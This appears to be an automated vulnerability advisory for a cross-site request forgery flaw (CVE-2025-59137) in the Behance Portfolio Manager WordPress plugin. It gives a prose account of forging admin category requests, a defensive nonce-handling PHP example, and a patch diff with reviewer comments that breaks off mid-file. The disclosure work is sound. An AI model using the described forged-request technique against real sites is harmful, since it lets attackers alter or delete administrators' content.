Atomic Edge Proof of Concept automated generator using AI diff analysis
Published: March 18, 2026

CVE-2025-59137: Behance Portfolio Manager <= 1.7.5 – Cross-Site Request Forgery (portfolio-manager-powered-by-behance)

Severity: Medium (CVSS 4.3)
CWE: 352
Vulnerable Version: 1.7.5
Patched Version: 1.8.0
Disclosed: December 30, 2025

Analysis Overview

Atomic Edge analysis of CVE-2025-59137:
The Behance Portfolio Manager WordPress plugin contains a Cross-Site Request Forgery vulnerability in versions up to and including 1.7.5. This vulnerability affects the category management functionality within the plugin’s admin interface. The CVSS 4.3 score reflects a medium-severity issue requiring user interaction for exploitation.

Root Cause:
The vulnerability exists in the `eds-bpm-category-manager.php` file, where the plugin processes category management actions. The `initialize()` function handles several operations, including the 'save', 'publish', 'unpublish', 'delete' and 'trash' actions. Before the patch, the plugin executed these actions without validating a WordPress nonce. The vulnerable code spans lines 58-84 of the original file, where the switch cases call the category management functions `save_category()`, `publish_category()`, `unpublish_category()`, `delete_category()` and `trash_category()` directly, with no CSRF protection.

Exploitation:
An attacker can craft a malicious HTML page containing a form that submits to the WordPress admin interface. The attack targets authenticated administrators holding the 'manage_options' capability. The forged form would POST to the plugin's category management endpoint with 'action' set to one of the vulnerable operations ('save', 'publish', 'unpublish', 'delete' or 'trash') along with the category data that action expects. Because the plugin checks only the user's capability and not the origin of the request, the administrator's browser attaches the authentication cookies automatically and the forged request executes a privileged category operation.

Patch Analysis:
The patch adds a `check_admin_referer('eds_bpm_nonce')` call before each vulnerable action in `eds-bpm-category-manager.php`. This WordPress function verifies that the request carries a valid nonce for the given action and the current user, and terminates the request with `wp_die()` when the check fails. The patch inserts this validation on lines 61, 65, 69, 73 and 77 of the patched file, corresponding to the 'save', 'publish', 'unpublish', 'delete' and 'trash' cases. Each administrative action therefore requires a nonce generated when the legitimate form was rendered; a page on another origin cannot read that token, so a forged request is rejected before any category function runs.

Impact:
Successful exploitation allows attackers to perform unauthorized category management operations when an administrator visits a malicious page. Attackers can create, modify, publish, unpublish, delete, or trash portfolio categories. This could disrupt the portfolio organization, remove legitimate categories, or inject malicious categories. The vulnerability requires social engineering to trick an administrator into clicking a link or visiting a compromised page while authenticated to the WordPress admin panel.
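As an added example that is not the plugin's own code, here is the complete nonce round trip the patch depends on: the form side emits the token with `wp_nonce_field()`, and the handler checks the capability and then the nonce once, before the `switch`, so no state-changing case is reachable without both. The nonce action `eds_bpm_nonce` and the five action names come from the patch; the class, field names and the option-backed store are assumptions made for illustration.

```php
<?php
// Added example, not code from the plugin: the two halves of WordPress nonce
// CSRF protection that the CVE-2025-59137 patch relies on. 'eds_bpm_nonce' and
// the action names come from the patch; the class, fields and the option-backed
// store are assumptions for illustration.

if ( ! defined( 'WPINC' ) ) {
	die;
}

class Example_Category_Handler {

	const NONCE_ACTION = 'eds_bpm_nonce';          // must match between form and check
	const STORE_KEY    = 'eds_bpm_example_cats';   // stand-in for the bpm_categories table

	/** Form side: wp_nonce_field() emits the hidden _wpnonce and _wp_http_referer inputs. */
	public function render_form( $page_url, $action = 'save', $category_id = 0 ) {
		echo '<form method="post" action="' . esc_url( $page_url ) . '">';
		wp_nonce_field( self::NONCE_ACTION );
		echo '<input type="hidden" name="action" value="' . esc_attr( $action ) . '" />';
		echo '<input type="hidden" name="category_id" value="' . absint( $category_id ) . '" />';
		if ( 'save' === $action ) {
			echo '<input type="text" name="category_name" value="" />';
		}
		submit_button( __( 'Apply', 'eds-bpm' ) );
		echo '</form>';
	}

	/** Handler side: returns 'list' for non-mutating requests, otherwise acts and redirects. */
	public function handle_request( $redirect_url ) {
		$action = isset( $_POST['action'] ) ? sanitize_key( wp_unslash( $_POST['action'] ) ) : '';

		$mutating = array( 'save', 'publish', 'unpublish', 'delete', 'trash' );
		if ( ! in_array( $action, $mutating, true ) ) {
			return 'list';                               // plain page view, nothing to protect
		}

		// 1. Authorization: may this user change categories at all?
		if ( ! current_user_can( 'manage_options' ) ) {
			wp_die( esc_html__( 'You are not allowed to manage categories.', 'eds-bpm' ), 403 );
		}

		// 2. Authenticity: did the request originate from our own form? check_admin_referer()
		//    verifies _wpnonce for the current user and calls wp_die() on failure, so a forged
		//    cross-site POST never reaches the switch below. One call covers every case, so a
		//    future case cannot be added without protection.
		check_admin_referer( self::NONCE_ACTION );

		$id   = isset( $_POST['category_id'] ) ? absint( $_POST['category_id'] ) : 0;
		$cats = $this->load();

		switch ( $action ) {
			case 'save':
				$name = isset( $_POST['category_name'] )
					? sanitize_text_field( wp_unslash( $_POST['category_name'] ) ) : '';
				if ( '' !== $name ) {
					$id          = $id ? $id : ( $cats ? max( array_keys( $cats ) ) + 1 : 1 );
					$cats[ $id ] = array( 'name' => $name, 'status' => 'draft' );
				}
				break;
			case 'publish':
				$this->set_status( $cats, $id, 'published' );
				break;
			case 'unpublish':
				$this->set_status( $cats, $id, 'draft' );
				break;
			case 'trash':
				$this->set_status( $cats, $id, 'trash' );
				break;
			case 'delete':
				unset( $cats[ $id ] );
				break;
		}

		$this->store( $cats );
		wp_safe_redirect( $redirect_url );               // POST-redirect-GET, as the plugin does
		exit;
	}

	private function set_status( array &$cats, $id, $status ) {
		if ( isset( $cats[ $id ] ) ) {
			$cats[ $id ]['status'] = $status;
		}
	}

	private function load() {
		$cats = get_option( self::STORE_KEY, array() );
		return is_array( $cats ) ? $cats : array();
	}

	private function store( array $cats ) {
		update_option( self::STORE_KEY, $cats );
	}
}
```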

Differential between vulnerable and patched code

Code Diff
--- a/portfolio-manager-powered-by-behance/classes/eds-bpm-admin.php
+++ b/portfolio-manager-powered-by-behance/classes/eds-bpm-admin.php
@@ -1,87 +1,87 @@
-<?php
-if ( ! defined( 'WPINC' ) ) {
-	die;
-}
-
-
-include_once EDS_BPM_Loader::$abs_path . '/classes/eds-bpm-config.php';
-include_once EDS_BPM_Loader::$abs_path . '/classes/eds-bpm-project-manager.php';
-include_once EDS_BPM_Loader::$abs_path . '/classes/eds-bpm-category-manager.php';
-include_once EDS_BPM_Loader::$abs_path . '/classes/eds-bpm-configuration-manager.php';
-
-if(!class_exists("EDS_BPM_Admin")){
-class EDS_BPM_Admin{
-
-	public function __construct(){
-
-	}
-
-	public function add_bpm_menu(){
-		$project_manager = new EDS_BPM_Project_Manager();
-		$category_manager = new EDS_BPM_Category_Manager();
-		$config_manager = EDS_BPM_Configuration_Manager::get_instance();
-
-		$page_hook1 = add_menu_page( /*$page_title*/__('Portfolio Manager - Projects', 'eds-bpm'),
-					/*$menu_title*/ __('Portfolio Manager','eds-bpm'),
-					/*$capability*/'manage_options',
-					/*$menu_slug*/EDS_BPM_Config::$eds_bpm_top_menu_slug,
-					/*$function*/array($project_manager, 'initialize'),
-					/*$icon_url*/plugin_dir_url(__FILE__).'../images/eds-bpm-16x16.png');
-
-		add_action("admin_print_scripts-" . $page_hook1 , array( $this, 'eds_bpm_add_scripts'));
-        add_action("admin_print_styles-".   $page_hook1 , array( $this, 'eds_bpm_add_css') );
-
-
-        $page_hook2 = add_submenu_page( /* $parent_slug */ EDS_BPM_Config::$eds_bpm_top_menu_slug,
-        			/*$page_title*/__('Portfolio Manager - Projects', 'eds-bpm'),
-					/*$menu_title*/ __('All Projects','eds-bpm'),
-					/*$capability*/'manage_options',
-					/*$menu_slug*/EDS_BPM_Config::$eds_bpm_top_menu_slug,
-					/*$function*/array($project_manager, 'initialize'));
-
-		add_action("admin_print_scripts-" . $page_hook2 , array( $this, 'eds_bpm_add_scripts'));
-        add_action("admin_print_styles-".   $page_hook2 , array( $this, 'eds_bpm_add_css') );
-
-        $page_hook3 = add_submenu_page( /* $parent_slug */ EDS_BPM_Config::$eds_bpm_top_menu_slug,
-        			/*$page_title*/__('Portfolio Manager - New Project', 'eds-bpm'),
-					/*$menu_title*/ __('Add New','eds-bpm'),
-					/*$capability*/'manage_options',
-					/*$menu_slug*/EDS_BPM_Config::$eds_bpm_new_project_slug,
-					/*$function*/array($project_manager, 'initialize'));
-
-		add_action("admin_print_scripts-" . $page_hook3 , array( $this, 'eds_bpm_add_scripts'));
-        add_action("admin_print_styles-".   $page_hook3 , array( $this, 'eds_bpm_add_css') );
-
-
-		$page_hook4 = add_submenu_page(/* $parent_slug */ EDS_BPM_Config::$eds_bpm_top_menu_slug,
-						/* $page_title */ __('Portfolio Manager - Categories', 'eds-bpm'),
-						/* $menu_title */__('Categories', 'eds-bpm'),
-						/* $capability */'manage_options',
-						/* $menu_slug */EDS_BPM_Config::$eds_bpm_category_menu_slug,
-						/* $function */ array($category_manager, 'initialize'));
-
-		add_action("admin_print_scripts-" . $page_hook4 , array( $this, 'eds_bpm_add_scripts'));
-        add_action("admin_print_styles-".   $page_hook4 , array( $this, 'eds_bpm_add_css') );
-
-
-		$page_hook5 = add_submenu_page(/* $parent_slug */ EDS_BPM_Config::$eds_bpm_top_menu_slug,
-						/* $page_title */ __('Portfolio Manager - Settings', 'eds-bpm'),
-						/* $menu_title */__('Settings', 'eds-bpm'),
-						/* $capability */'manage_options',
-						/* $menu_slug */EDS_BPM_Config::$eds_bpm_cofig_menu_slug,
-						/* $function */ array($config_manager, 'init_configuration_page'));
-
-		add_action("admin_print_scripts-" . $page_hook5, array( $this, 'eds_bpm_add_scripts'));
-        add_action("admin_print_styles-".   $page_hook5, array( $this, 'eds_bpm_add_css') );
-
-	}
-
-	public function eds_bpm_add_scripts(){
-		do_action('eds_bpm_load_admin_scripts_on_page');
-	}
-
-	public function eds_bpm_add_css(){
-		do_action('eds_bpm_load_admin_styles_on_page');
-	}
-}
+<?php
+if ( ! defined( 'WPINC' ) ) {
+	die;
+}
+
+
+include_once EDS_BPM_Loader::$abs_path . '/classes/eds-bpm-config.php';
+include_once EDS_BPM_Loader::$abs_path . '/classes/eds-bpm-project-manager.php';
+include_once EDS_BPM_Loader::$abs_path . '/classes/eds-bpm-category-manager.php';
+include_once EDS_BPM_Loader::$abs_path . '/classes/eds-bpm-configuration-manager.php';
+
+if(!class_exists("EDS_BPM_Admin")){
+class EDS_BPM_Admin{
+
+	public function __construct(){
+
+	}
+
+	public function add_bpm_menu(){
+		$project_manager = new EDS_BPM_Project_Manager();
+		$category_manager = new EDS_BPM_Category_Manager();
+		$config_manager = EDS_BPM_Configuration_Manager::get_instance();
+
+		$page_hook1 = add_menu_page( /*$page_title*/__('Portfolio Manager - Projects', 'eds-bpm'),
+					/*$menu_title*/ __('Portfolio Manager','eds-bpm'),
+					/*$capability*/'manage_options',
+					/*$menu_slug*/EDS_BPM_Config::$eds_bpm_top_menu_slug,
+					/*$function*/array($project_manager, 'initialize'),
+					/*$icon_url*/plugin_dir_url(__FILE__).'../images/eds-bpm-16x16.png');
+
+		add_action("admin_print_scripts-" . $page_hook1 , array( $this, 'eds_bpm_add_scripts'));
+        add_action("admin_print_styles-".   $page_hook1 , array( $this, 'eds_bpm_add_css') );
+
+
+        $page_hook2 = add_submenu_page( /* $parent_slug */ EDS_BPM_Config::$eds_bpm_top_menu_slug,
+        			/*$page_title*/__('Portfolio Manager - Projects', 'eds-bpm'),
+					/*$menu_title*/ __('All Projects','eds-bpm'),
+					/*$capability*/'manage_options',
+					/*$menu_slug*/EDS_BPM_Config::$eds_bpm_top_menu_slug,
+					/*$function*/array($project_manager, 'initialize'));
+
+		add_action("admin_print_scripts-" . $page_hook2 , array( $this, 'eds_bpm_add_scripts'));
+        add_action("admin_print_styles-".   $page_hook2 , array( $this, 'eds_bpm_add_css') );
+
+        $page_hook3 = add_submenu_page( /* $parent_slug */ EDS_BPM_Config::$eds_bpm_top_menu_slug,
+        			/*$page_title*/__('Portfolio Manager - New Project', 'eds-bpm'),
+					/*$menu_title*/ __('Add New','eds-bpm'),
+					/*$capability*/'manage_options',
+					/*$menu_slug*/EDS_BPM_Config::$eds_bpm_new_project_slug,
+					/*$function*/array($project_manager, 'initialize'));
+
+		add_action("admin_print_scripts-" . $page_hook3 , array( $this, 'eds_bpm_add_scripts'));
+        add_action("admin_print_styles-".   $page_hook3 , array( $this, 'eds_bpm_add_css') );
+
+
+		$page_hook4 = add_submenu_page(/* $parent_slug */ EDS_BPM_Config::$eds_bpm_top_menu_slug,
+						/* $page_title */ __('Portfolio Manager - Categories', 'eds-bpm'),
+						/* $menu_title */__('Categories', 'eds-bpm'),
+						/* $capability */'manage_options',
+						/* $menu_slug */EDS_BPM_Config::$eds_bpm_category_menu_slug,
+						/* $function */ array($category_manager, 'initialize'));
+
+		add_action("admin_print_scripts-" . $page_hook4 , array( $this, 'eds_bpm_add_scripts'));
+        add_action("admin_print_styles-".   $page_hook4 , array( $this, 'eds_bpm_add_css') );
+
+
+		$page_hook5 = add_submenu_page(/* $parent_slug */ EDS_BPM_Config::$eds_bpm_top_menu_slug,
+						/* $page_title */ __('Portfolio Manager - Settings', 'eds-bpm'),
+						/* $menu_title */__('Settings', 'eds-bpm'),
+						/* $capability */'manage_options',
+						/* $menu_slug */EDS_BPM_Config::$eds_bpm_cofig_menu_slug,
+						/* $function */ array($config_manager, 'init_configuration_page'));
+
+		add_action("admin_print_scripts-" . $page_hook5, array( $this, 'eds_bpm_add_scripts'));
+        add_action("admin_print_styles-".   $page_hook5, array( $this, 'eds_bpm_add_css') );
+
+	}
+
+	public function eds_bpm_add_scripts(){
+		do_action('eds_bpm_load_admin_scripts_on_page');
+	}
+
+	public function eds_bpm_add_css(){
+		do_action('eds_bpm_load_admin_styles_on_page');
+	}
+}
 }
 No newline at end of file
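Review bot: all 87 lines of this hunk are removed and re-added with identical content, so this is line-ending or encoding churn rather than a functional change, and it buries the one real fix (the five-line hunk in eds-bpm-category-manager.php) under full-file rewrites. Normalize line endings in a separate commit, or via .gitattributes, so the CSRF fix can be reviewed on its own.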
--- a/portfolio-manager-powered-by-behance/classes/eds-bpm-behance.php
+++ b/portfolio-manager-powered-by-behance/classes/eds-bpm-behance.php
@@ -1,121 +1,121 @@
-<?php
-if ( ! defined( 'WPINC' ) ) {
-	die;
-}
-include_once EDS_BPM_Loader::$abs_path. '/classes/eds-bpm-config.php';
-include_once EDS_BPM_Loader::$abs_path. '/includes/Be/ApiException.php';
-include_once EDS_BPM_Loader::$abs_path. '/includes/Be/Client.php';
-
-if(!class_exists("EDS_BPM_Behance")){
-class EDS_BPM_Behance{
-
-	var $general_config = null;
-
-	public function __construct(){
-		$this->general_config = EDS_BPM_Config::get_general_config();
-	}
-
-	public function get_behance_project($id){
-		$result = new stdClass();
-		$id = trim($id);
-
-		$result->data = $this->fetch_project_content($id);
-		if($result->data==null || !isset($result->data))
-		{
-			$result->status = 'F';
-			$result->data = null;
-			$result->msg = __('Unable to retrieve Project from Behance.' , 'eds-bpm');
-		}
-		else if($result->data == -1)
-		{
-			$result->status = 'F';
-			$result->data = null;
-			$result->msg = __('You need to enter the Behance API Key in Portfolio Manager > Settings > General. Get one from' , 'eds-bpm');
-			$result->msg .= ' <a href="https://www.behance.net/dev" target="_blank">'. __('here' , 'eds-bpm') . '</a>';
-		}
-		else
-		{
-			$result->status = 'S';
-			$result->msg = __('Project content retrieved successfully.' , 'eds-bpm');
-		}
-		return $result;
-
-	}
-
-
-	private function fetch_project_content($projectID){
-
-		$bAPIKey = $this->general_config['behance_api_key'];
-
-		if(isset($bAPIKey) && $bAPIKey!='')
-		{
-			$clientID= trim($bAPIKey);
-			try {
-				$api = new Be_Client( $clientID);
-				$data =  $api->getProject( $projectID , true);
-				return $data;
-			}
-			catch(Exception $e)
-			{
-				return null;
-			}
-		}
-		else
-			return -1;
-	}
-
-	public function get_user_projects( $user_id ) {
-		$bAPIKey = $this->general_config['behance_api_key'];
-		$userProjects = array();
-		$pageNumber  = 1;
-		if(isset($bAPIKey) && $bAPIKey!='')
-		{
-			$clientID= trim($bAPIKey);
-			try {
-				$api = new Be_Client( $clientID);
-				while(1) {
-					$projects =  $api->getUserProjects( $user_id, array("page" => $pageNumber), true);
-					if( !empty( $projects )) {
-						$userProjects = array_merge($userProjects, $projects);
-						$pageNumber++;
-					} else {
-						break;
-					}
-				}
-
-				return $userProjects;
-			}
-			catch(Exception $e)
-			{
-				return null;
-			}
-		}
-		else
-			return null;
-
-	}
-
-	public function get_project_comments($projectID) {
-
-	    $bAPIKey = $this->general_config['behance_api_key'];
-
-	    if(isset($bAPIKey) && $bAPIKey!='')
-	    {
-	        $clientID= trim($bAPIKey);
-	        try {
-	            $api = new Be_Client( $clientID);
-	            $data =  $api->getProjectComments( $projectID, true);
-	            return $data;
-	        }
-	        catch(Exception $e)
-	        {
-	            return null;
-	        }
-	    }
-	    else
-	        return null;
-	}
-
-
-}
+<?php
+if ( ! defined( 'WPINC' ) ) {
+	die;
+}
+include_once EDS_BPM_Loader::$abs_path. '/classes/eds-bpm-config.php';
+include_once EDS_BPM_Loader::$abs_path. '/includes/Be/ApiException.php';
+include_once EDS_BPM_Loader::$abs_path. '/includes/Be/Client.php';
+
+if(!class_exists("EDS_BPM_Behance")){
+class EDS_BPM_Behance{
+
+	var $general_config = null;
+
+	public function __construct(){
+		$this->general_config = EDS_BPM_Config::get_general_config();
+	}
+
+	public function get_behance_project($id){
+		$result = new stdClass();
+		$id = trim($id);
+
+		$result->data = $this->fetch_project_content($id);
+		if($result->data==null || !isset($result->data))
+		{
+			$result->status = 'F';
+			$result->data = null;
+			$result->msg = __('Unable to retrieve Project from Behance.' , 'eds-bpm');
+		}
+		else if($result->data == -1)
+		{
+			$result->status = 'F';
+			$result->data = null;
+			$result->msg = __('You need to enter the Behance API Key in Portfolio Manager > Settings > General. Get one from' , 'eds-bpm');
+			$result->msg .= ' <a href="https://www.behance.net/dev" target="_blank">'. __('here' , 'eds-bpm') . '</a>';
+		}
+		else
+		{
+			$result->status = 'S';
+			$result->msg = __('Project content retrieved successfully.' , 'eds-bpm');
+		}
+		return $result;
+
+	}
+
+
+	private function fetch_project_content($projectID){
+
+		$bAPIKey = $this->general_config['behance_api_key'];
+
+		if(isset($bAPIKey) && $bAPIKey!='')
+		{
+			$clientID= trim($bAPIKey);
+			try {
+				$api = new Be_Client( $clientID);
+				$data =  $api->getProject( $projectID , true);
+				return $data;
+			}
+			catch(Exception $e)
+			{
+				return null;
+			}
+		}
+		else
+			return -1;
+	}
+
+	public function get_user_projects( $user_id ) {
+		$bAPIKey = $this->general_config['behance_api_key'];
+		$userProjects = array();
+		$pageNumber  = 1;
+		if(isset($bAPIKey) && $bAPIKey!='')
+		{
+			$clientID= trim($bAPIKey);
+			try {
+				$api = new Be_Client( $clientID);
+				while(1) {
+					$projects =  $api->getUserProjects( $user_id, array("page" => $pageNumber), true);
+					if( !empty( $projects )) {
+						$userProjects = array_merge($userProjects, $projects);
+						$pageNumber++;
+					} else {
+						break;
+					}
+				}
+
+				return $userProjects;
+			}
+			catch(Exception $e)
+			{
+				return null;
+			}
+		}
+		else
+			return null;
+
+	}
+
+	public function get_project_comments($projectID) {
+
+	    $bAPIKey = $this->general_config['behance_api_key'];
+
+	    if(isset($bAPIKey) && $bAPIKey!='')
+	    {
+	        $clientID= trim($bAPIKey);
+	        try {
+	            $api = new Be_Client( $clientID);
+	            $data =  $api->getProjectComments( $projectID, true);
+	            return $data;
+	        }
+	        catch(Exception $e)
+	        {
+	            return null;
+	        }
+	    }
+	    else
+	        return null;
+	}
+
+
+}
 }
 No newline at end of file
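Review bot: same whole-file churn as the eds-bpm-admin.php hunk: 121 lines removed and re-added unchanged, with no functional difference. Drop it from the security fix or land the normalization separately.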
--- a/portfolio-manager-powered-by-behance/classes/eds-bpm-category-manager.php
+++ b/portfolio-manager-powered-by-behance/classes/eds-bpm-category-manager.php
@@ -58,26 +58,31 @@
 				break;

 			case 'save':
+				check_admin_referer('eds_bpm_nonce');
 				$this->save_category();
 				wp_redirect($url);exit;
 				break;

 			case 'publish':
+				check_admin_referer('eds_bpm_nonce');
 				$this->publish_category();
 				wp_redirect($url);exit;
 				break;

 			case 'unpublish':
+				check_admin_referer('eds_bpm_nonce');
 				$this->unpublish_category();
 				wp_redirect($url);exit;
 				break;

 			case 'delete':
+				check_admin_referer('eds_bpm_nonce');
 				$this->delete_category();
 				wp_redirect($url);exit;
 				break;

 			case 'trash':
+				check_admin_referer('eds_bpm_nonce');
 				$this->trash_category();
 				wp_redirect($url);exit;
 				break;
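Review bot: the five `check_admin_referer('eds_bpm_nonce');` calls are correct, but repeating the check per case is fragile; a single call above the `switch` for every state-changing action cannot be forgotten when a new case is added. Two things this hunk cannot show and that need confirming before merge: the case whose `break;` opens the hunk is not visible, so check whether it also mutates state, and no hunk in this diff adds the matching `wp_nonce_field('eds_bpm_nonce')` (or `wp_nonce_url()`) to the category forms, without which `check_admin_referer()` will `wp_die()` on every legitimate submission. Note also that `check_admin_referer()` terminates the request on failure, so `wp_redirect($url);exit;` is never reached for a forged request, which is the intended behaviour.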
--- a/portfolio-manager-powered-by-behance/classes/eds-bpm-config.php
+++ b/portfolio-manager-powered-by-behance/classes/eds-bpm-config.php
@@ -1,169 +1,169 @@
-<?php
-if ( ! defined( 'WPINC' ) ) {
-	die;
-}
-
-if(!class_exists("EDS_BPM_Config")){
-class EDS_BPM_Config{
-
-	public static $project_table = "bpm_projects";
-	public static $category_table = "bpm_categories";
-
-	public static $eds_bpm_top_menu_slug = "eds-bpm-top-menu";
-	public static $eds_bpm_new_project_slug = "eds-bpm-new-project";
-	public static $eds_bpm_category_menu_slug = "eds-bpm-cat-menu";
-
-	public static $eds_bpm_cofig_menu_slug = "eds-bpm-config-menu";
-
-	public static $general_config_key = "eds-bpm-general-config";
-	public static $advanced_config_key = "eds-bpm-advanced-config";
-	public static $general_section = "eds-bpm-general-section";
-	public static $advanced_section = "eds-bpm-advanced-section";
-
-	public static $navigation_button_config_key = "eds-bpm-navigation-btn";
-	public static $navigation_button_section = "eds-bpm-navigation-btn-section";
-
-	public static $result_per_page = 10;
-
-	public static $advanced_config = null;
-	public static $general_config = null;
-	public static $navigation_button_config = null;
-
-	public static function get_js_messages() {
-		return array(
-				'chooseImage' => __('Choose Image', 'eds-bpm'),
-				'selectCategory' => __('Please select atleast one Category','eds-bpm'),
-				'deleteSelectedCategory' => __('Are you sure, you wish to delete the selected category(s)?','eds-bpm'),
-				'permanentDeleteSelectedCategory' => __('Are you sure, you wish to permanently delete the selected category?','eds-bpm'),
-				'selectOneProject' => __('Please select atleast one Project','eds-bpm'),
-				'deleteSelectedProject' => __('Are you sure, you wish to delete the selected project(s)?','eds-bpm'),
-				'permanentDeleteSelectedProject' => __('Are you sure, you wish to permanently delete the selected project(s)?','eds-bpm'),
-				'provideUserId' => __('Please provide user id.','eds-bpm'),
-				'importingProjects' => __('Importing Projects...','eds-bpm'),
-				'projectsImported' => __('Project(s) Imported.','eds-bpm'),
-				'unableImportingProjects' => __('Unable to import projects, please check the Behance User Id and Behance API key in settings.','eds-bpm'),
-				'problemImportingProjects' => __('A problem occured while importing projects. Please try again later.','eds-bpm'),
-				'noProjectAvailable' => __('No Project available to save. kindly import the projects first.','eds-bpm'),
-				'savingProjects' => __('Saving Projects, It might take some time...','eds-bpm'),
-				'projectsSaved' => __('Projects saved successfully, refreshing page now.','eds-bpm'),
-				'problemSavingProjects' => __('Problem occured while saving projects. Please try again after some time. If the problem persist, please','eds-bpm'),
-				'contactPluginAdministor' => __('contact plugin administrator','eds-bpm'),
-				'behanceProjectId' => __('Please enter Behance Project ID','eds-bpm'),
-				'inputNumericValue' => __('Please enter a numeric value','eds-bpm'),
-				'portfolioManager' => __('Portfolio Manager - Powered by Behance','eds-bpm'),
-				'authorName' => __('Eleopard Design Studios Pvt. Ltd.','eds-bpm')
-		);
-	}
-
-	public static function get_advanced_config(){
-		if(self::$advanced_config ==null){
-			self::$advanced_config = array();
-
-			if(get_option( self::$advanced_config_key ) === false){
-			    self::$advanced_config = array_merge( array(
-			        'project_background_color' => '#f1f1f1',
-			    	'loading_icon_color' => '#333333',
-			    	'show_project_title' => 'yes',
-			    	'show_creative_fields' =>'yes',
-			    	'show_project_by' => 'yes',
-			    	'show_about_project' => 'yes',
-			    	'show_publish_date' => 'yes',
-			    	'show_views' => 'yes',
-			    	'show_appreciations' => 'yes',
-			    	'show_comments' => 'yes',
-			    	'show_tags' => 'yes',
-			    	'show_tools_used' => 'yes',
-			    	'show_copyright_info' => 'yes',
-			    	'eds_bpm_custom_css' => '',
-				    'show_project_comments' => ''
-			        ), self::$advanced_config );
-			}else
-				self::$advanced_config = (array) get_option( EDS_BPM_Config::$advanced_config_key);
-		}
-
-		return self::$advanced_config;
-	}
-
-
-	public static function get_navigation_button_config(){
-		if(self::$navigation_button_config ==null){
-			self::$navigation_button_config = array();
-
-			if(get_option( self::$navigation_button_config_key ) === false){
-				self::$navigation_button_config = array_merge( array(
-						'show_prev_next_btn' => 'yes',
-						'prev_next_project_order' => 'doc',
-						'prev_btn_text' =>'Prev',
-						'prev_btn_text_color' => '#ffffff',
-						'prev_btn_bg_color' => '#333333',
-						'next_btn_text' => 'Next',
-						'next_btn_text_color' => '#ffffff',
-						'next_btn_bg_color' => '#333333',
-						'prev_next_btn_style' => 'default',
-						'prev_next_btn_position' => 'top',
-						'prev_next_btn_icon' => 'yes'
-				), self::$navigation_button_config );
-			}else
-				self::$navigation_button_config = (array) get_option( EDS_BPM_Config::$navigation_button_config_key);
-		}
-
-		return self::$navigation_button_config;
-	}
-
-	public static function get_general_config(){
-		if(self::$general_config ==null){
-
-			self::$general_config = array();
-
-			if(get_option( self::$general_config_key ) === false){
-				self::$general_config = array_merge( array(
-			        'behance_api_key' => '',
-			    	'result_per_page' => self::$result_per_page,
-					'view_project_on_behance' => '',
-					'open_in_different_tab' => 'yes'
-			        ), self::$general_config );
-			}else{
-				self::$general_config = (array) get_option( EDS_BPM_Config::$general_config_key);
-			}
-
-		}
-
-		return self::$general_config;
-	}
-
-
-	public static function get_current_page_url() {
-	 	$pageURL = 'http';
-	 	if (isset($_SERVER["HTTPS"]) && $_SERVER["HTTPS"] == "on") {$pageURL .= "s";}
-	 	$pageURL .= "://";
-	 	if ($_SERVER["SERVER_PORT"] != "80") {
-	  		$pageURL .= $_SERVER["SERVER_NAME"].":".$_SERVER["SERVER_PORT"].$_SERVER["REQUEST_URI"];
-	 	} else {
-	  		$pageURL .= $_SERVER["SERVER_NAME"].$_SERVER["REQUEST_URI"];
-	 	}
-	 	return $pageURL;
-	}
-
-	public static function trim_all( $str , $what = NULL , $with = ' ' )
-	{
-	    if( $what === NULL )
-	    {
-	        //  Character      Decimal      Use
-	        //  ""            0           Null Character
-	        //  "t"            9           Tab
-	        //  "n"           10           New line
-	        //  "x0B"         11           Vertical Tab
-	        //  "r"           13           New Line in Mac
-	        //  " "            32           Space
-
-	        $what   = "\x00-\x20";    //all white-spaces and control chars
-	    }
-
-	    return trim( preg_replace( "/[".$what."]+/" , $with , $str ) , $what );
-	}
-
-	public static function is_curl_loaded() {
-    	return extension_loaded( 'curl' );
-  	}
-}
+<?php
+if ( ! defined( 'WPINC' ) ) {
+	die;
+}
+
+if(!class_exists("EDS_BPM_Config")){
+class EDS_BPM_Config{
+
+	public static $project_table = "bpm_projects";
+	public static $category_table = "bpm_categories";
+
+	public static $eds_bpm_top_menu_slug = "eds-bpm-top-menu";
+	public static $eds_bpm_new_project_slug = "eds-bpm-new-project";
+	public static $eds_bpm_category_menu_slug = "eds-bpm-cat-menu";
+
+	public static $eds_bpm_cofig_menu_slug = "eds-bpm-config-menu";
+
+	public static $general_config_key = "eds-bpm-general-config";
+	public static $advanced_config_key = "eds-bpm-advanced-config";
+	public static $general_section = "eds-bpm-general-section";
+	public static $advanced_section = "eds-bpm-advanced-section";
+
+	public static $navigation_button_config_key = "eds-bpm-navigation-btn";
+	public static $navigation_button_section = "eds-bpm-navigation-btn-section";
+
+	public static $result_per_page = 10;
+
+	public static $advanced_config = null;
+	public static $general_config = null;
+	public static $navigation_button_config = null;
+
+	public static function get_js_messages() {
+		return array(
+				'chooseImage' => __('Choose Image', 'eds-bpm'),
+				'selectCategory' => __('Please select atleast one Category','eds-bpm'),
+				'deleteSelectedCategory' => __('Are you sure, you wish to delete the selected category(s)?','eds-bpm'),
+				'permanentDeleteSelectedCategory' => __('Are you sure, you wish to permanently delete the selected category?','eds-bpm'),
+				'selectOneProject' => __('Please select atleast one Project','eds-bpm'),
+				'deleteSelectedProject' => __('Are you sure, you wish to delete the selected project(s)?','eds-bpm'),
+				'permanentDeleteSelectedProject' => __('Are you sure, you wish to permanently delete the selected project(s)?','eds-bpm'),
+				'provideUserId' => __('Please provide user id.','eds-bpm'),
+				'importingProjects' => __('Importing Projects...','eds-bpm'),
+				'projectsImported' => __('Project(s) Imported.','eds-bpm'),
+				'unableImportingProjects' => __('Unable to import projects, please check the Behance User Id and Behance API key in settings.','eds-bpm'),
+				'problemImportingProjects' => __('A problem occured while importing projects. Please try again later.','eds-bpm'),
+				'noProjectAvailable' => __('No Project available to save. kindly import the projects first.','eds-bpm'),
+				'savingProjects' => __('Saving Projects, It might take some time...','eds-bpm'),
+				'projectsSaved' => __('Projects saved successfully, refreshing page now.','eds-bpm'),
+				'problemSavingProjects' => __('Problem occured while saving projects. Please try again after some time. If the problem persist, please','eds-bpm'),
+				'contactPluginAdministor' => __('contact plugin administrator','eds-bpm'),
+				'behanceProjectId' => __('Please enter Behance Project ID','eds-bpm'),
+				'inputNumericValue' => __('Please enter a numeric value','eds-bpm'),
+				'portfolioManager' => __('Portfolio Manager - Powered by Behance','eds-bpm'),
+				'authorName' => __('Eleopard Design Studios Pvt. Ltd.','eds-bpm')
+		);
+	}
+
+	public static function get_advanced_config(){
+		if(self::$advanced_config ==null){
+			self::$advanced_config = array();
+
+			if(get_option( self::$advanced_config_key ) === false){
+			    self::$advanced_config = array_merge( array(
+			        'project_background_color' => '#f1f1f1',
+			    	'loading_icon_color' => '#333333',
